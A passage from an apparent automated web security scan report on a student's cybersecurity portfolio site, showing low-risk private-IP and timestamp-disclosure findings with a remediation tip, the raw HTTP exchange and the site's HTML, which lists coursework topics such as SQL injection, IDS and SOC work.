          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal40" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
           <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <script data-cfasync="false" src="/cdn-cgi/scripts/5c5dd728/cloudflare-static/email-decode.min.js"></script><script src="vendor/jquery/jquery.min.js"></script>
          <script src="vendor/bootstrap/js/bootstrap.bundle.min.js"></script>
          
          <script src="vendor/jquery-easing/jquery.easing.min.js"></script>
          
          <script src="js/jqBootstrapValidation.js"></script>
          <script src="js/contact_me.js"></script>
          
          <script src="js/agency.min.js"></script>
          
          <script src="https://cdn.jsdelivr.net/gh/google/code-prettify@master/loader/run_prettify.js"></script>
          </body>
          </html>
          
          Evidence
          172.16.0.2
          Solution

          Remove the private IP address from the HTTP response body. For comments, use JSP/ASP/PHP comment instead of HTML/JavaScript comment which can be seen by client browsers.

  3. Risk=Low, Confidence=Low (52)

    1. https://beekmans.dev (52)

      1. Timestamp Disclosure - Unix (52)
        1. GET https://beekmans.dev
          Alert tags
          Alert description

          A timestamp was disclosed by the application/web server - Unix

          Other info

          000613396, which evaluates to: 1970-01-08 03:23:16

          Request
          Request line and header section (192 bytes)
          GET https://beekmans.dev HTTP/1.1
          Host: beekmans.dev
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:82.0) Gecko/20100101 Firefox/82.0
          Pragma: no-cache
          Cache-Control: no-cache
          
          
          Request body (0 bytes)
          Response
          Status line and header section (1047 bytes)
          HTTP/1.1 200 OK
          Date: Mon, 06 Dec 2021 09:55:11 GMT
          Content-Type: text/html; charset=UTF-8
          Connection: keep-alive
          vary: Accept-Encoding
          content-security-policy: default-src 'self' http: https: data: blob: 'unsafe-inline'
          x-frame-options: SAMEORIGIN
          x-xss-protection: 1; mode=block
          x-content-type-options: nosniff
          referrer-policy: no-referrer-when-downgrade
          strict-transport-security: max-age=31536000; includeSubDomains; preload
          CF-Cache-Status: DYNAMIC
          Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=4lOrbKK8y%2Bn8QLhKEGpB7rePrCHT1J%2BQaOZJP06h5%2BW2GkK9CRq%2Fdn7ChLzJzoJLiDaKfMYCpMPOGx7ddQ5eVNaVcohEeYRecx%2BV4c%2BapqYy04o6ANFaN3V3sF2rfmk%3D"}],"group":"cf-nel","max_age":604800}
          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
          Server: cloudflare
          CF-RAY: 6b94a31e5f8a4c13-AMS
          alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
          
          
          Response body (178340 bytes)
          <!DOCTYPE html>
          <html lang="en">
          <head>
          <meta charset="utf-8">
          <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
          <meta name="description" content="">
          <meta name="author" content="">
          <title>Cyber portfolio</title>
          
          <link href="vendor/bootstrap/css/bootstrap.min.css" rel="stylesheet">
          
          <link href="vendor/fontawesome-free/css/all.min.css" rel="stylesheet" type="text/css">
          <link href="https://fonts.googleapis.com/css?family=Montserrat:400,700" rel="stylesheet" type="text/css">
          <link href='https://fonts.googleapis.com/css?family=Kaushan+Script' rel='stylesheet' type='text/css'>
          <link href='https://fonts.googleapis.com/css?family=Droid+Serif:400,700,400italic,700italic' rel='stylesheet' type='text/css'>
          <link href='https://fonts.googleapis.com/css?family=Roboto+Slab:400,100,300,700' rel='stylesheet' type='text/css'>
          
          <link href="css/agency.min.css" rel="stylesheet">
          </head>
          <body id="page-top">
          
          <nav class="navbar navbar-expand-lg navbar-dark fixed-top" id="mainNav">
          <div class="container">
          <a class="navbar-brand js-scroll-trigger" href="#page-top">Cyber security</a>
          <button class="navbar-toggler navbar-toggler-right" type="button" data-toggle="collapse" data-target="#navbarResponsive" aria-controls="navbarResponsive" aria-expanded="false" aria-label="Toggle navigation">
          Menu
          <i class="fas fa-bars"></i>
          </button>
          <div class="collapse navbar-collapse" id="navbarResponsive">
          <ul class="navbar-nav text-uppercase ml-auto">
          <li class="nav-item">
          <a class="nav-link js-scroll-trigger" href="#services">Services</a>
          </li>
          <li class="nav-item">
          <a class="nav-link js-scroll-trigger" href="#portfolio">Portfolio</a>
          </li>
          <li class="nav-item">
          <a class="nav-link js-scroll-trigger" href="#about">About</a>
          </li>
          <li class="nav-item">
          <a class="nav-link js-scroll-trigger" href="#team">Team</a>
          </li>
          <li class="nav-item">
          <a class="nav-link js-scroll-trigger" href="#contact">Contact</a>
          </li>
          </ul>
          </div>
          </div>
          </nav>
          
          <header class="masthead">
          <div class="container">
          <div class="intro-text">
          <div class="intro-lead-in">Welcome To My Portfolio!</div>
          <div class="intro-heading text-uppercase">It's Nice To Meet You</div>
          <a class="btn btn-primary btn-xl text-uppercase js-scroll-trigger" href="#services">Tell Me More</a>
          </div>
          </div>
          </header>
          
          <section id="services">
          <div class="container">
          <div class="row">
          <div class="col-lg-12 text-center">
          <h2 class="section-heading text-uppercase">Introduction</h2>
          <h3 class="section-subheading text-muted">My project.</h3>
          </div>
          </div>
          <div class="row text-center">
          <div class="col-md-4">
          <span class="fa-stack fa-4x">
          <i class="fas fa-circle fa-stack-2x text-primary"></i>
          <i class="fas fa-shopping-cart fa-stack-1x fa-inverse"></i>
          </span>
          <h4 class="service-heading">Environment</h4>
          <p class="text-muted">I'm using my own Hyper visor (Microsoft's Hyper-V) on a private server in my home. I can connect via a VPN that's also running on this server to my home network to remotely manage the server and manage and deploy VM's. The server is an old DELL T310 with a Xeon x3440, 24GB ddr3 registered ecc 1333mhz memory and all VM's are installed on a Crucial MX500 ssd. The server is part of the home network just like every other computer in my home.</p>
          </div>
          <div class="col-md-4">
          <span class="fa-stack fa-4x">
          <i class="fas fa-circle fa-stack-2x text-primary"></i>
          <i class="fas fa-laptop fa-stack-1x fa-inverse"></i>
          </span>
          <h4 class="service-heading">Context</h4>
          <p class="text-muted">The network I'm building has as focus a webhosting company with some onsite employee's maybe a place for guests and some webservers hosting different websites.</p>
          </div>
          <div class="col-md-4">
          <span class="fa-stack fa-4x">
          <i class="fas fa-circle fa-stack-2x text-primary"></i>
          <i class="fas fa-lock fa-stack-1x fa-inverse"></i>
          </span>
          <h4 class="service-heading">Security</h4>
          <p class="text-muted">The network is secured by separating the webservers from the employees and guests on their own VLAN. The network is protected by a pfsense router running custom firewalls for every interface and running Surricata to identify and block possible threats.</p>
          </div>
          </div>
          </div>
          </section>
          
          <section class="bg-light" id="portfolio">
          <div class="container">
          <div class="row">
          <div class="col-lg-12 text-center">
          <h2 class="section-heading text-uppercase">Portfolio</h2>
          <h3 class="section-subheading text-muted">Cyber security.</h3>
          </div>
          </div>
          <div class="row">
          <div class="col-lg-12 text-center">
          <h4 class="section-subheading text-muted">Blue teaming semester</h4>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal1">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/blue/01-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S3</h4>
          <p class="text-muted">Self assessment week 1</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal2">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid portfolio-image" src="img/portfolio/blue/02-thumbnail.gif" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S3</h4>
          <p class="text-muted">Network diagram V1</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal3">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/blue/03-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S3</h4>
          <p class="text-muted">Network diagram V2</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal4">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/blue/04-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S3</h4>
          <p class="text-muted">Secure connections</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal5">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/blue/05-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S3</h4>
          <p class="text-muted">IDS/IPS</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal6">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/blue/06-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S3</h4>
          <p class="text-muted">Information Security and Risk Analysis</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal7">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/blue/07-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S3</h4>
          <p class="text-muted">IT Monitoring</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-lg-12 text-center">
          <h4 class="section-subheading text-muted">Red teaming semester</h4>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal8">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/red/08-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S4</h4>
          <p class="text-muted">SQL injection</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal9">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/red/09-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S4</h4>
          <p class="text-muted">Command injection</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal10">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/red/10-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S4</h4>
          <p class="text-muted">Cross-site scripting</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal11">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/red/11-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S4</h4>
          <p class="text-muted">Cross-site request forgery</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal12">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/red/12-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S4</h4>
          <p class="text-muted">Path traversal</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal13">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/red/13-thumbnail.jpeg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S4</h4>
          <p class="text-muted">Password cracking</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal14">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/red/14-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S4</h4>
          <p class="text-muted">Network scanning and enumeration</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal15">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/red/15-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S4</h4>
          <p class="text-muted">Network sniffing and spoofing</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal16">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/red/16-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S4</h4>
          <p class="text-muted">Law, Ethics and Responsible Disclosure</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal17">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
           </div>
          </div>
          <img class="img-fluid" src="img/portfolio/red/17-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S4</h4>
          <p class="text-muted">Basic hacking process</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal18">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/red/18-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S4</h4>
          <p class="text-muted">Self reflection</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-lg-12 text-center">
          <h4 class="section-subheading text-muted">Internship</h4>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal19">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/internship/19-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S5</h4>
          <p class="text-muted">My internship</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-lg-12 text-center">
          <h4 class="section-subheading text-muted">Minor</h4>
          </div>
          </div>
          <div class="row">
          <div class="col-lg-12 text-center">
          <h5 class="section-subheading text-muted">Red teaming specialisation</h5>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal20">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/20-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Pentesting methods</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal21">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/21&22&31-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">HTB Linux write-up</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal22">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
           <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/21&22&31-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">HTB Windows write-up</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal23">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/23-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Red VS Blue Event</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal24">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/24&28&29&30-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Vulnerability analysis session</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal25">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/25-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Personal pen-test toolbox</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal26">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/26-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Security of IOT protocols and technology</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal27">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/27-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Pen-test at COMPANY_NAME_HERE</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal28">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/24&28&29&30-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Vulnerability analysis on a smartphone app</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal29">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/24&28&29&30-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Vulnerability analysis on a website</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal30">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/24&28&29&30-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Vulnerability analysis on a device</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal31">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/21&22&31-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Organize a weekly Hack The Box event</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-lg-12 text-center">
          <h5 class="section-subheading text-muted">Blue teaming specialisation</h5>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal32">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/blue/32-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Red VS Blue Event</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal33">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/blue/33&37-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">IDS technologies</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal34">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/blue/34-thumbnail.svg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Monitoring technologies</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal35">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/blue/35-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">SIEM technologies</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal36">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/blue/36-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Threat use cases</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal37">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/blue/33&37-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Developing and tuning an IDS</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal38">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
           <img class="img-fluid" src="img/portfolio/minor/blue/38-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Setting up a SOC</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal39">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/blue/39-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Vulnerability scanning</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal40">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/blue/40-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Security monitoring, analysis and triage</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-lg-12 text-center">
          <h5 class="section-subheading text-muted">Forensics specialisation</h5>
          </div>
          </div>
          </div>
          </section>
          
          <section id="about">
          <div class="container">
          <div class="row">
          <div class="col-lg-12 text-center">
          <h2 class="section-heading text-uppercase">About</h2>
          <h3 class="section-subheading text-muted">My cyber security career.</h3>
          </div>
          </div>
          <div class="row">
          <div class="col-lg-12">
          <ul class="timeline">
          <li>
          <div class="timeline-image">
          <img class="rounded-circle img-fluid" src="img/about/1.jpg" alt="">
          </div>
          <div class="timeline-panel">
          <div class="timeline-heading">
          <h4>Fontys S3 2019</h4>
          <h4 class="subheading">The beginning</h4>
          </div>
          <div class="timeline-body">
          <p class="text-muted">This was the first time I got experienced the cyber security stream and what it had to offer. I learned the basics of the defensive side of cyber security.</p>
          </div>
          </div>
          </li>
          <li class="timeline-inverted">
          <div class="timeline-image">
          <img class="rounded-circle img-fluid" src="img/about/2.jpg" alt="">
          </div>
          <div class="timeline-panel">
          <div class="timeline-heading">
          <h4>Fontys S4 2020</h4>
          <h4 class="subheading">Round 2</h4>
          </div>
          <div class="timeline-body">
          <p class="text-muted">This was my second semester on cyber security this time focusing on the offensive side.</p>
          </div>
          </div>
          </li>
          <li>
          <div class="timeline-image">
          <img class="rounded-circle img-fluid" src="img/about/3.png" alt="">
          </div>
          <div class="timeline-panel">
          <div class="timeline-heading">
          <h4>Fontys S5 2021</h4>
          <h4 class="subheading">The internship</h4>
          </div>
          <div class="timeline-body">
          <p class="text-muted">Lorem ipsum dolor sit amet, consectetur adipisicing elit. Sunt ut voluptatum eius sapiente, totam reiciendis temporibus qui quibusdam, recusandae sit vero unde, sed, incidunt et ea quo dolore laudantium consectetur!</p>
          </div>
          </div>
          </li>
          <li class="timeline-inverted">
          <div class="timeline-image">
          <img class="rounded-circle img-fluid" src="img/about/4.jpg" alt="">
          </div>
          <div class="timeline-panel">
          <div class="timeline-heading">
          <h4>Fontys S7 2021</h4>
          <h4 class="subheading">My minor</h4>
          </div>
          <div class="timeline-body">
